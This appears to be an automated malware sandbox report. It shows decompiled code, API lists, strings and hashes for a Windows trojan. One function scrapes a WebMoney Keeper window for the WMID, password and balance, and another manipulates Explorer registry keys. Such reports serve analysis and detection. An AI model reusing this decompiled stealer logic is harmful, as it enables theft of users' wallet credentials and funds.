							_t93 =  *0x414ad4; // 0x241f5a8
							_push( *((intOrPtr*)(_t93 + 0x194)));
							_push(0x8002);
							_push(_v12);
							continue;
						}
						_t157 = GetDlgItem(_v12, 0x1a3);
						_v40 = _t157;
						__eflags = _t157 - _t155;
						if(_t157 == _t155) {
							goto L7;
						}
						_t96 = GetClassNameW(_t157,  &_v332, 0x63);
						_t145 = 3;
						__eflags = _t96 - _t145;
						if(_t96 <= _t145) {
							goto L7;
						}
						_t154 = _t154 | 0xffffffff;
						_t99 = E0040F6F6(_t154, L"SysListView32", _t154,  &_v332);
						__eflags = _t99;
						if(_t99 != 0) {
							goto L7;
						}
						_v36 = SendMessageW(_t157, 0x1004, _t155, _t155);
						_t158 = SendMessageW(SendMessageW(_t157, 0x101f, _t155, _t155), 0x1200, _t155, _t155);
						__eflags = _t158 - _t155;
						if(_t158 > _t155) {
							__eflags = _v36 - _t155;
							_v8 = _t155;
							_v112 = _t145;
							_v108 = _t155;
							if(_v36 <= _t155) {
								L53:
								E0040F15E(_v8);
								while(1) {
									L1:
									Sleep(0x2710);
									_t88 =  *0x414ad4; // 0x241f5a8
									_push( *((intOrPtr*)(_t88 + 0x194)));
									_push(0x8002);
									_push(_t155);
									goto L8;
								}
							} else {
								goto L11;
							}
							do {
								L11:
								_v20 = _v20 | 0xffffffff;
								_t145 = _t145 | 0x000000ff;
								__eflags = _t158 - _t155;
								_v104 = _t155;
								if(_t158 > _t155) {
									while(1) {
										_v332 = 0;
										_v92 =  &_v332;
										_v88 = 0xbe;
										_t107 = SendMessageW(_v40, 0x1005, _t155,  &_v112);
										__eflags = _t107;
										if(_t107 == 0) {
											goto L53;
										}
										_t108 =  &_v332;
										__eflags = _v92 - _t108;
										if(_v92 != _t108) {
											__eflags = _v92 - _t155;
											if(_v92 != _t155) {
												 *0x414dd8(_t108, _v92);
											}
										}
										_t154 = E0040F637( &_v332);
										__eflags = _t145 - 0xff;
										if(_t145 != 0xff) {
											L28:
											__eflags = _v20 - 0xffffffff;
											if(_v20 == 0xffffffff) {
												_v20 = E0040BF42(_t154,  &_v332);
											}
											__eflags = _v104 + 1 - _t158;
											_t112 = "\r\n";
											if(_v104 + 1 != _t158) {
												_t112 = " | ";
											}
											 *0x414de0( &_v332, _t112);
											_t116 = E0040A673( &_v8,  &_v332, _t155);
											__eflags = _t116;
											if(_t116 == 0) {
												_t155 = 0;
												__eflags = 0;
												goto L53;
											} else {
												_v104 = _v104 + 1;
												__eflags = _v104 - _t158;
												if(_v104 < _t158) {
													_t155 = 0;
													__eflags = 0;
													continue;
												}
												__eflags = _t145 - 0xff;
												if(_t145 != 0xff) {
													_t136 = _v20;
													__eflags = _t136 - 0xffffffff;
													if(_t136 != 0xffffffff) {
														__eflags =  *((intOrPtr*)(0x401190 + (_t145 & 0x000000ff) * 4)) - _t136;
														if(__eflags <= 0) {
															_v52 = _v52 & 0x00000000;
															_v48 = _v48 | 0xffffffff;
															_v42 = 0xaf2;
															_v44 = 0xaf2;
															E0040B960(0xaf2, __eflags,  &_v52);
															 *0x414be8 =  *0x414be8 | 0x00000002;
															__eflags =  *0x414be8;
														}
													}
												}
												_t155 = 0;
												__eflags = 0;
												goto L39;
											}
										} else {
											__eflags = _t154 - 0xd;
											if(_t154 != 0xd) {
												L27:
												_t145 = _t145 | 0x000000ff;
												__eflags = _t145;
												goto L28;
											}
											_t142 = 1;
											while(1) {
												_t152 =  *((intOrPtr*)(_t162 + (_t142 & 0x000000ff) - 0x148));
												__eflags = _t152 - 0x39;
												if(_t152 > 0x39) {
													goto L27;
												}
												__eflags = _t152 - 0x30;
												if(_t152 < 0x30) {
													goto L27;
												}
												_t142 = _t142 + 1;
												__eflags = _t142 - 0xd;
												if(_t142 < 0xd) {
													continue;
												}
												_t153 = 0;
												__eflags = 0;
												while(1) {
													_t145 = _v332;
													_t36 = (_t153 & 0x000000ff) + "ZREGUYB"; // 0x59554745
													__eflags = _t145 -  *_t36;
													if(_t145 ==  *_t36) {
														break;
													}
													_t153 = _t153 + 1;
													__eflags = _t153 - 7;
													if(_t153 < 7) {
														continue;
													}
													goto L27;
												}
												_t145 = _t153;
												goto L28;
											}
											goto L27;
										}
									}
									goto L53;
								}
								L39:
								_t154 = _v36;
								_v108 = _v108 + 1;
								__eflags = _v108 - _t154;
							} while (_v108 < _t154);
							__eflags = _v8 - _t155;
							if(_v8 == _t155) {
								goto L53;
							}
							_t148 = _v8;
							_t117 = E0040F637(_v8);
							__eflags = _t117 - (_t158 * 3 - 1) * _t154;
							_v24 = _t117;
							if(_t117 <= (_t158 * 3 - 1) * _t154) {
								goto L53;
							}
							__eflags = _v16 - _t155;
							if(_v16 == _t155) {
								L44:
								_t119 = GetDlgItemTextA(_v12, 0x37b,  &_v332, 0xc7);
								__eflags = _t119;
								if(_t119 == 0) {
									_t132 = 0x2d;
									_v332 = _t132;
									__eflags = 0;
									_v330 = 0;
								}
								_v28 = 0x14;
								_v32 = _t155;
								_t123 = E004085D2(0x80000001, L"software\\webmoney", L"version",  &_v32,  &_v132,  &_v28);
								__eflags = _t123;
								if(_t123 == 0) {
									L49:
									_t124 = 0x2d;
									_v132 = _t124;
									__eflags = 0;
									_v130 = 0;
									goto L50;
								} else {
									__eflags = _v28 - 0x10;
									if(_v28 != 0x10) {
										goto L49;
									}
									__eflags = _v32 - 1;
									if(__eflags == 0) {
										L50:
										_push(_v8);
										_push( &_v132);
										_push( &_v332);
										_push("ults");
										E0041352B(_t148, _t154, __eflags, 0xc8, _t155, _t155, L"WMKeeper data\n\nWMID: %S\nPassword: %S\nType: %S\nVersion: %s\n\nBalance:\n%S", "rlappedAccessResults");
										_t163 = _t163 + 0x24;
										_v16 = E0040F346(E0040F15E(_v16) | 0xffffffff, _v8);
										goto L53;
									}
									goto L49;
								}
							}
							_t154 = _t154 | 0xffffffff;
							_t135 = E0040F65D(_t154, _t148, _t154, _v16);
							__eflags = _t135;
							if(_t135 == 0) {
								goto L53;
							}
							goto L44;
						}
						goto L7;
					}
				}
			}



















































        0x0040bfde
        0x0040bfe4
        0x0040bfe6
        0x0040bfe9
        0x0040bfe9
        0x0040bfee
        0x0040bff4
        0x0040bff9
        0x0040bfff
        0x0040c004
        0x0040c0b3
        0x0040c0b3
        0x0040c0b4
        0x0040c0ba
        0x0040c0bf
        0x0040c0c5
        0x0040c0c5
        0x0040c011
        0x0040c014
        0x0040c01d
        0x0040c023
        0x0040c0a0
        0x0040c0a0
        0x0040c0a5
        0x0040c0ab
        0x0040c0b0
        0x00000000
        0x0040c0b0
        0x0040c033
        0x0040c035
        0x0040c038
        0x0040c03a
        0x00000000
        0x00000000
        0x0040c046
        0x0040c04e
        0x0040c04f
        0x0040c051
        0x00000000
        0x00000000
        0x0040c059
        0x0040c064
        0x0040c069
        0x0040c06b
        0x00000000
        0x00000000
        0x0040c08a
        0x0040c09a
        0x0040c09c
        0x0040c09e
        0x0040c0ca
        0x0040c0cd
        0x0040c0d0
        0x0040c0d3
        0x0040c0d6
        0x0040c340
        0x0040c343
        0x0040bfe9
        0x0040bfe9
        0x0040bfee
        0x0040bff4
        0x0040bff9
        0x0040bfff
        0x0040c004
        0x00000000
        0x0040c005
        0x00000000
        0x00000000
        0x00000000
        0x0040c0dc
        0x0040c0dc
        0x0040c0dc
        0x0040c0e0
        0x0040c0e3
        0x0040c0e5
        0x0040c0e8
        0x0040c0f2
        0x0040c0f4
        0x0040c101
        0x0040c111
        0x0040c118
        0x0040c11e
        0x0040c120
        0x00000000
        0x00000000
        0x0040c126
        0x0040c12c
        0x0040c12f
        0x0040c131
        0x0040c134
        0x0040c13a
        0x0040c13a
        0x0040c134
        0x0040c14b
        0x0040c14d
        0x0040c150
        0x0040c194
        0x0040c194
        0x0040c198
        0x0040c1a6
        0x0040c1a6
        0x0040c1ad
        0x0040c1af
        0x0040c1b4
        0x0040c1b6
        0x0040c1b6
        0x0040c1c3
        0x0040c1d4
        0x0040c1d9
        0x0040c1db
        0x0040c33e
        0x0040c33e
        0x00000000
        0x0040c1e1
        0x0040c1e1
        0x0040c1e4
        0x0040c1e7
        0x0040c0f0
        0x0040c0f0
        0x00000000
        0x0040c0f0
        0x0040c1ed
        0x0040c1f0
        0x0040c1f2
        0x0040c1f5
        0x0040c1f8
        0x0040c1fd
        0x0040c204
        0x0040c206
        0x0040c20a
        0x0040c215
        0x0040c21d
        0x0040c221
        0x0040c226
        0x0040c226
        0x0040c226
        0x0040c204
        0x0040c1f8
        0x0040c22d
        0x0040c22d
        0x00000000
        0x0040c22d
        0x0040c152
        0x0040c152
        0x0040c155
        0x0040c191
        0x0040c191
        0x0040c191
        0x00000000
        0x0040c191
        0x0040c157
        0x0040c159
        0x0040c15c
        0x0040c163
        0x0040c166
        0x00000000
        0x00000000
        0x0040c168
        0x0040c16b
        0x00000000
        0x00000000
        0x0040c16d
        0x0040c16f
        0x0040c171
        0x00000000
        0x00000000
        0x0040c173
        0x0040c173
        0x0040c175
        0x0040c175
        0x0040c17e
        0x0040c17e
        0x0040c184
        0x00000000
        0x00000000
        0x0040c18a
        0x0040c18c
        0x0040c18f
        0x00000000
        0x00000000
        0x00000000
        0x0040c18f
        0x0040c337
        0x00000000
        0x0040c337
        0x00000000
        0x0040c159
        0x0040c150
        0x00000000
        0x0040c0f2
        0x0040c22f
        0x0040c22f
        0x0040c232
        0x0040c235
        0x0040c235
        0x0040c23e
        0x0040c241
        0x00000000
        0x00000000
        0x0040c247
        0x0040c24a
        0x0040c256
        0x0040c258
        0x0040c25b
        0x00000000
        0x00000000
        0x0040c261
        0x0040c264
        0x0040c27b
        0x0040c28f
        0x0040c295
        0x0040c297
        0x0040c29b
        0x0040c29c
        0x0040c2a3
        0x0040c2a5
        0x0040c2a5
        0x0040c2c7
        0x0040c2ce
        0x0040c2d1
        0x0040c2d6
        0x0040c2d8
        0x0040c2e6
        0x0040c2e8
        0x0040c2e9
        0x0040c2ed
        0x0040c2ef
        0x00000000
        0x0040c2da
        0x0040c2da
        0x0040c2de
        0x00000000
        0x00000000
        0x0040c2e0
        0x0040c2e4
        0x0040c2f3
        0x0040c2f3
        0x0040c2f9
        0x0040c300
        0x0040c301
        0x0040c317
        0x0040c31c
        0x0040c332
        0x00000000
        0x0040c332
        0x00000000
        0x0040c2e4
        0x0040c2d8
        0x0040c269
        0x0040c26e
        0x0040c273
        0x0040c275
        0x00000000
        0x00000000
        0x00000000
        0x0040c275
        0x00000000
        0x0040c09e
        0x0040c0b3

        APIs
        • GetCurrentThread.KERNEL32 ref: 0040BFD7
        • SetThreadPriority.KERNEL32(00000000), ref: 0040BFDE
        • Sleep.KERNEL32(00002710), ref: 0040BFEE
        • GetWindowThreadProcessId.USER32(?,?), ref: 0040C014
        • GetDlgItem.USER32(?,000001A3), ref: 0040C02D
        • GetClassNameW.USER32(00000000,?,00000063), ref: 0040C046
        • SendMessageW.USER32(00000000,00001004,00000000,00000000), ref: 0040C075
        • SendMessageW.USER32(00000000,0000101F,00000000,00000000), ref: 0040C08D
        • SendMessageW.USER32(00000000), ref: 0040C094
        • FindWindowExW.USER32(00000000,00000000,00008002,?), ref: 0040C0B4
        • SendMessageW.USER32(?,00001005,00000000,?), ref: 0040C118
        • lstrcpy.KERNEL32(?,?), ref: 0040C13A
        • lstrcat.KERNEL32(?,004020A0), ref: 0040C1C3
        • GetDlgItemTextA.USER32(?,0000037B,?,000000C7), ref: 0040C28F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: MessageSend$Thread$ItemWindow$ClassCurrentFindNamePriorityProcessSleepTextlstrcatlstrcpy
        • String ID: | $SysListView32$WMKeeper dataWMID: %SPassword: %SType: %SVersion: %sBalance:%S$rlappedAccessResults$software\webmoney$version
        • API String ID: 995943755-3800094676
        • Opcode ID: c457d868ef9cc28ef56fa886b64622119c3fe2c0e6648a8aada8bbcacfcf8b42
        • Instruction ID: ce090efd776d120814c5aa139271221565ebbd43b648cbc296a699e44edc8cef
        • Opcode Fuzzy Hash: c457d868ef9cc28ef56fa886b64622119c3fe2c0e6648a8aada8bbcacfcf8b42
        • Instruction Fuzzy Hash: 47A17C31D00218EADB219BE5CC85AEEBBB9EF45714F20427BE515F62E0D7384A81CF59
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00408AED, Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 266registryCOMMON
        Download Yara Rule
        C-Code - Quality: 93%
        			E00408AED() {
				void** _t94;
				signed int _t99;
				long _t113;
				long _t121;
				long _t130;
				short* _t136;
				int _t138;
				char* _t139;
				intOrPtr* _t143;
				void* _t145;
				void* _t156;
				int _t163;
				int _t167;
				void* _t170;
				void* _t172;

				_t170 = _t172 - 0x6c;
				_t156 =  *( *(_t170 + 0x7c));
				_t163 = 0;
				if(_t156 <= 0x10) {
					L47:
					return _t163;
				}
				 *(_t170 + 0x68) = 0;
				if((_t156 - 0x00000010 & 0xfffffffe) <= 0) {
					goto L47;
				} else {
					_t136 =  *( *(_t170 + 0x78));
					_t143 = _t136;
					while( *_t143 != _t163) {
						 *(_t170 + 0x68) =  *(_t170 + 0x68) + 1;
						_t143 = _t143 + 2;
						if( *(_t170 + 0x68) < _t156 - 0x10 >> 1) {
							continue;
						} else {
							L46:
							goto L47;
						}
					}
					_t145 = E0040F649(_t136) + _t80;
					_t150 = _t145 + _t136 + 2;
					 *(_t170 + 0x64) = _t145 + _t136 + 2 + 0x10;
					 *(_t170 + 0x60) = _t136 -  *(_t170 + 0x64) + _t156;
					if(_t156 - _t145 + 2 < 0x10) {
						goto L46;
					}
					E004086BF(_t170 - 4, _t150);
					if( *_t136 != 0x2a ||  *((intOrPtr*)(_t136 + 2)) != 0) {
						E004101CA(_t170 + 0x4c, _t136, E0040F649(_t136) + _t86);
						E004086BF(_t170 - 0x54, _t170 + 0x4c);
						PathCombineW(_t170 - 0x25c, L"software\\microsoft\\windows\\currentversion\\explorer", _t170 - 0x54);
						_t138 =  *(_t170 + 0x74);
						_t94 = _t170 + 0x68;
						if(_t138 != 0xf) {
							_t99 = RegOpenKeyExW(0x80000001, _t170 - 0x25c, 0, (0 | _t138 == 0x00000011) + 1, _t94);
						} else {
							_t99 = RegCreateKeyExW(0x80000001, _t170 - 0x25c, 0, 0, 0, 2, 0, _t94, 0);
						}
						asm("sbb esi, esi");
						_t163 =  ~_t99 + 1;
						if(_t163 == 0) {
							goto L46;
						} else {
							if(_t138 != 0xf) {
								if(_t138 != 0x11) {
									if(_t138 == 0x10) {
										_t163 = 0;
										if(RegQueryValueExW( *(_t170 + 0x68), _t170 - 4, 0, 0, 0, _t170 + 0x74) == 0) {
											_t104 =  *(_t170 + 0x74);
											if( *(_t170 + 0x74) != 0) {
												_t139 = E0040F14B(_t104);
												if(_t139 != 0) {
													if(RegQueryValueExW( *(_t170 + 0x68), _t170 - 4, 0, 0, _t139, _t170 + 0x74) != 0) {
														E0040F15E(_t139);
													} else {
														_t167 =  *(_t170 + 0x78);
														E0040F15E( *_t167);
														 *_t167 = _t139;
														_t163 =  *(_t170 + 0x74);
														 *( *(_t170 + 0x7c)) = _t163;
													}
												}
											}
										}
									}
									L44:
									_push( *(_t170 + 0x68));
									goto L45;
								}
								_t113 = RegDeleteValueW( *(_t170 + 0x68), _t170 - 4);
								L36:
								asm("sbb esi, esi");
								_t163 =  ~_t113 + 1;
								goto L44;
							}
							_t113 = RegSetValueExW( *(_t170 + 0x68), _t170 - 4, 0, 3,  *(_t170 + 0x64),  *(_t170 + 0x60));
							goto L36;
						}
					} else {
						if(RegOpenKeyExW(0x80000001, L"software\\microsoft\\windows\\currentversion\\explorer", 0, 8, _t170 + 0x5c) != 0) {
							goto L46;
						} else {
							 *(_t170 + 0x78) = 0;
							while(1) {
								 *(_t170 + 0x7c) = 0x28;
								_t121 = RegEnumKeyExW( *(_t170 + 0x5c),  *(_t170 + 0x78), _t170 - 0x54, _t170 + 0x7c, 0, 0, 0, _t170 + 0x54);
								if(_t121 == 0xea) {
									goto L26;
								}
								if(_t121 != 0) {
									_push( *(_t170 + 0x5c));
									L45:
									RegCloseKey();
									goto L46;
								}
								if( *(_t170 + 0x7c) == 0x26 &&  *(_t170 - 0x54) == 0x7b &&  *((short*)(_t170 - 0xa)) == 0x7d) {
									PathCombineW(_t170 - 0x25c, L"software\\microsoft\\windows\\currentversion\\explorer", _t170 - 0x54);
									if( *(_t170 + 0x74) != 0x11) {
										if( *(_t170 + 0x74) != 0xf) {
											 *(_t170 + 0x68) = 0;
											L25:
											RegCloseKey( *(_t170 + 0x68));
											goto L26;
										}
										if(RegCreateKeyExW(0x80000001, _t170 - 0x25c, 0, 0, 0, 2, 0, _t170 + 0x68, 0) == 0) {
											_t130 = RegSetValueExW( *(_t170 + 0x68), _t170 - 4, 0, 3,  *(_t170 + 0x64),  *(_t170 + 0x60));
											L22:
											if(_t130 == 0) {
												_t163 = _t163 + 1;
											}
										}
										goto L25;
									}
									if(RegOpenKeyExW(0x80000001, _t170 - 0x25c, 0, 2, _t170 + 0x68) != 0) {
										goto L25;
									} else {
										_t130 = RegDeleteValueW( *(_t170 + 0x68), _t170 - 4);
										goto L22;
									}
								}
								L26:
								 *(_t170 + 0x78) =  *(_t170 + 0x78) + 1;
							}
						}
					}
				}
			}


















        0x00408aee
        0x00408afd
        0x00408aff
        0x00408b04
        0x00408dd0
        0x00408dd8
        0x00408dd8
        0x00408b0d
        0x00408b16
        0x00000000
        0x00408b1c
        0x00408b20
        0x00408b22
        0x00408b24
        0x00408b29
        0x00408b34
        0x00408b38
        0x00000000
        0x00408b3a
        0x00408dcf
        0x00000000
        0x00408dcf
        0x00408b38
        0x00408b46
        0x00408b49
        0x00408b50
        0x00408b5e
        0x00408b64
        0x00000000
        0x00000000
        0x00408b6d
        0x00408b78
        0x00408caf
        0x00408cba
        0x00408ccf
        0x00408cd5
        0x00408cd8
        0x00408cde
        0x00408d14
        0x00408ce0
        0x00408cf4
        0x00408cf4
        0x00408d1e
        0x00408d20
        0x00408d23
        0x00000000
        0x00408d29
        0x00408d2c
        0x00408d49
        0x00408d64
        0x00408d74
        0x00408d7e
        0x00408d80
        0x00408d85
        0x00408d8c
        0x00408d90
        0x00408da8
        0x00408dc1
        0x00408daa
        0x00408daa
        0x00408daf
        0x00408db7
        0x00408db9
        0x00408dbc
        0x00408dbc
        0x00408da8
        0x00408d90
        0x00408d85
        0x00408d7e
        0x00408dc6
        0x00408dc6
        0x00000000
        0x00408dc6
        0x00408d52
        0x00408d58
        0x00408d5c
        0x00408d5e
        0x00000000
        0x00408d5e
        0x00408d3e
        0x00000000
        0x00408d3e
        0x00408b88
        0x00408ba2
        0x00000000
        0x00408ba8
        0x00408ba8
        0x00408bab
        0x00408bbd
        0x00408bc7
        0x00408bd2
        0x00000000
        0x00000000
        0x00408bda
        0x00408c98
        0x00408dc9
        0x00408dc9
        0x00000000
        0x00408dc9
        0x00408be4
        0x00408c10
        0x00408c1a
        0x00408c48
        0x00408c84
        0x00408c87
        0x00408c8a
        0x00000000
        0x00408c8a
        0x00408c65
        0x00408c77
        0x00408c7d
        0x00408c7f
        0x00408c81
        0x00408c81
        0x00408c7f
        0x00000000
        0x00408c65
        0x00408c33
        0x00000000
        0x00408c35
        0x00408c3c
        0x00000000
        0x00408c3c
        0x00408c33
        0x00408c90
        0x00408c90
        0x00408c90
        0x00408bab
        0x00408ba2
        0x00408b78

        APIs
        • RegOpenKeyExW.ADVAPI32(80000001,software\microsoft\windows\currentversion\explorer,00000000,00000008,?), ref: 00408B9A
        • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 00408BC7
        • PathCombineW.SHLWAPI(?,software\microsoft\windows\currentversion\explorer,?), ref: 00408C10
        • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000002,?), ref: 00408C2B
        • RegDeleteValueW.ADVAPI32(?,?), ref: 00408C3C
        • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00408C5D
        • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00408C77
          • Part of subcall function 004101CA: CryptAcquireContextW.ADVAPI32(#A,00000000,00000000,00000001,F0000040,?,0041230D,00000000,?,-0000001C,00000000,?,?,?), ref: 004101E3
          • Part of subcall function 004101CA: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004101FB
          • Part of subcall function 004101CA: CryptHashData.ADVAPI32(?,00000010), ref: 00410216
          • Part of subcall function 004101CA: CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 0041022D
          • Part of subcall function 004101CA: CryptDestroyHash.ADVAPI32(?), ref: 00410244
          • Part of subcall function 004101CA: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0041024E
        • RegCloseKey.ADVAPI32(?), ref: 00408C8A
        • PathCombineW.SHLWAPI(?,software\microsoft\windows\currentversion\explorer,?,?,?,00000000), ref: 00408CCF
        • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000,?,00000000), ref: 00408CF4
        • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,00000000), ref: 00408D14
        • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,?,?,00000000), ref: 00408D3E
        • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00408D52
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00408D76
        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00408DA0
        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00408DC9
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CryptValue$Hash$CreateOpen$CloseCombineContextDeletePathQuery$AcquireDataDestroyEnumFreeHeapParamRelease
        • String ID: *$software\microsoft\windows\currentversion\explorer
        • API String ID: 1179558880-1506458415
        • Opcode ID: 7fab160a00c92f07773720b11c3ed80d8b7178bdb7f9b8aefebef46c99abfa12
        • Instruction ID: d6b04ee6cc9bd758e60b8eb28b5d7a8422b939a61d2d3aa49b95f6fa866d5de9
        • Opcode Fuzzy Hash: 7fab160a00c92f07773720b11c3ed80d8b7178bdb7f9b8aefebef46c99abfa12
        • Instruction Fuzzy Hash: 5F914971500209AFEB20DFA1CD88DEE7BB9EF95740F20413AF951A6191EA349D45CBA8
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00406E24, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 163sleepfilesynchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00406E24(void* __eflags) {
				intOrPtr _v12;
				intOrPtr _v20;
				void* __ecx;
				void* __esi;
				intOrPtr _t23;
				WCHAR* _t27;
				void* _t28;
				WCHAR* _t29;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t35;
				long _t38;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t47;
				signed int _t49;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t64;
				intOrPtr _t65;
				void* _t68;
				void* _t70;

				E0040882D();
				 *0x4147d4 = CreateEventW(0, 1, 0, 0);
				E0040AE3C(0x4147e0);
				_t23 =  *0x414ad4; // 0x241f5a8
				PathCombineW(0x4147e0, 0x4147e0,  *(_t23 + 0xc));
				 *0x4147dc = CreateFileW(0x4147e0, 0x80000000, 0, 0, 3, 0, 0);
				E0040B30C();
				_t27 = L00404155();
				 *0x4147cc = _t27;
				_t28 = CreateFileW(_t27, 0x80000000, 0, 0, 4, 0, 0);
				 *0x4147d8 = _t28;
				if(_t28 == 0xffffffff) {
					 *0x4147d8 = 0;
				}
				_t29 = E00412C8D();
				 *0x4147d0 = _t29;
				_t30 = CreateFileW(_t29, 0x80000000, 0, 0, 4, 0, 0);
				 *0x4149e8 = _t30;
				_t73 = _t30 - 0xffffffff;
				if(_t30 == 0xffffffff) {
					 *0x4149e8 = 0;
				}
				_t31 =  *0x414ad4; // 0x241f5a8
				_v20 = E0040A8E2(_t64, _t73, E00406CA1,  *((intOrPtr*)(_t31 + 0x2c)));
				_t33 =  *0x414ad4; // 0x241f5a8
				_t34 = E0040AA0E( *((intOrPtr*)(_t33 + 0x28)));
				_t74 = _t34;
				if(_t34 != 0) {
					_t59 =  *0x414ad4; // 0x241f5a8
					E0040AA33(_t74,  *((intOrPtr*)(_t59 + 0x28)), 3, 0, 0, 0, 0);
					while(1) {
						_t61 =  *0x414ad4; // 0x241f5a8
						if(E0040AA0E( *((intOrPtr*)(_t61 + 0x28))) == 0) {
							goto L8;
						}
						Sleep(0x14);
					}
				}
				L8:
				_t70 = E0040A191;
				do {
					_t35 =  *0x414ad4; // 0x241f5a8
					if(E0040AA0E( *((intOrPtr*)(_t35 + 0x28))) == 0) {
						_t65 =  *0x414ad4; // 0x241f5a8
						_t49 = 0;
						_t68 = E0040B135( *((intOrPtr*)(_t65 + ((_t49 & 0xffffff00 | ( *0x414be8 & 0x00000001) != 0x00000000) + 5) * 4)));
						while(E00407DA0(0, _t65, _t70 -  *0x414ca0, _t68) == 0) {
							Sleep(0x14);
						}
						while(1) {
							_t57 =  *0x414ad4; // 0x241f5a8
							if(E0040AA0E( *((intOrPtr*)(_t57 + 0x28))) != 0) {
								goto L16;
							}
							Sleep(0x14);
						}
					}
					L16:
					E0040B355(0x4147e0);
					Sleep(0x64);
					_t38 = WaitForSingleObject( *0x4147d4, 0x32);
					_t80 = _t38;
				} while (_t38 != 0);
				_t39 =  *0x414ad4; // 0x241f5a8
				E0040AA33(_t80,  *((intOrPtr*)(_t39 + 0x28)), 3, 0, 0, 0, 0);
				while(1) {
					_t41 =  *0x414ad4; // 0x241f5a8
					if(E0040AA0E( *((intOrPtr*)(_t41 + 0x28))) == 0) {
						break;
					}
					Sleep(0x14);
				}
				CloseHandle( *0x4147d4);
				CloseHandle( *0x4147d8);
				CloseHandle( *0x4149e8);
				CloseHandle( *0x4147dc);
				_t47 =  *0x414ad4; // 0x241f5a8
				return E0040A9B9(_v12,  *((intOrPtr*)(_t47 + 0x2c)));
			}




























        0x00406e29
        0x00406e3b
        0x00406e47
        0x00406e4c
        0x00406e56
        0x00406e6f
        0x00406e74
        0x00406e79
        0x00406e86
        0x00406e8b
        0x00406e91
        0x00406e99
        0x00406e9b
        0x00406e9b
        0x00406ea1
        0x00406eae
        0x00406eb3
        0x00406eb9
        0x00406ebe
        0x00406ec1
        0x00406ec3
        0x00406ec3
        0x00406ec9
        0x00406edb
        0x00406edf
        0x00406ee7
        0x00406eec
        0x00406eee
        0x00406ef0
        0x00406efe
        0x00406f0d
        0x00406f0d
        0x00406f1c
        0x00000000
        0x00000000
        0x00406f07
        0x00406f07
        0x00406f0d
        0x00406f1e
        0x00406f1e
        0x00406f23
        0x00406f23
        0x00406f32
        0x00406f3b
        0x00406f43
        0x00406f52
        0x00406f5e
        0x00406f58
        0x00406f58
        0x00406f7d
        0x00406f7d
        0x00406f8c
        0x00000000
        0x00000000
        0x00406f77
        0x00406f77
        0x00406f7d
        0x00406f8e
        0x00406f8f
        0x00406f96
        0x00406fa4
        0x00406faa
        0x00406faa
        0x00406fb2
        0x00406fc0
        0x00406fcf
        0x00406fcf
        0x00406fde
        0x00000000
        0x00000000
        0x00406fc9
        0x00406fc9
        0x00406fe6
        0x00406ff2
        0x00406ffe
        0x0040700a
        0x00407010
        0x00407026

        APIs
        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406E35
          • Part of subcall function 0040AE3C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,004069ED,?,?), ref: 0040AE5D
        • PathCombineW.SHLWAPI(004147E0,004147E0,?), ref: 00406E56
        • CreateFileW.KERNEL32(004147E0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00406E69
          • Part of subcall function 0040B30C: PathCombineW.SHLWAPI(?,?,0241F5A8), ref: 0040B32F
          • Part of subcall function 0040B30C: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040B33E
          • Part of subcall function 0040B30C: SetFileAttributesW.KERNEL32(?,00000006), ref: 0040B34D
        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 00406E8B
        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 00406EB3
        • Sleep.KERNEL32(00000014,?,?,00000003,00000000,00000000,00000000,00000000,?,Function_00006CA1,?), ref: 00406F07
        • Sleep.KERNEL32(00000014,-0000AB0F,00000000,0241F5A8,?,?,Function_00006CA1,?), ref: 00406F58
        • Sleep.KERNEL32(00000014,?,-0000AB0F,00000000), ref: 00406F77
        • Sleep.KERNEL32(00000064,004147E0,?,?,Function_00006CA1,?), ref: 00406F96
        • WaitForSingleObject.KERNEL32(00000032), ref: 00406FA4
        • Sleep.KERNEL32(00000014,?,?,00000003,00000000,00000000,00000000,00000000), ref: 00406FC9
          • Part of subcall function 0040A9B9: SetEvent.KERNEL32(?,00000000,0040A179,?), ref: 0040A9C3
          • Part of subcall function 0040A9B9: WaitForSingleObject.KERNEL32(?,000000FF,0000EA60,00000000,00000000,00000000,00000000,00000000), ref: 0040A9DC
          • Part of subcall function 0040A9B9: CloseHandle.KERNEL32(00000004), ref: 0040A9E4
          • Part of subcall function 0040A9B9: CloseHandle.KERNEL32(?), ref: 0040A9ED
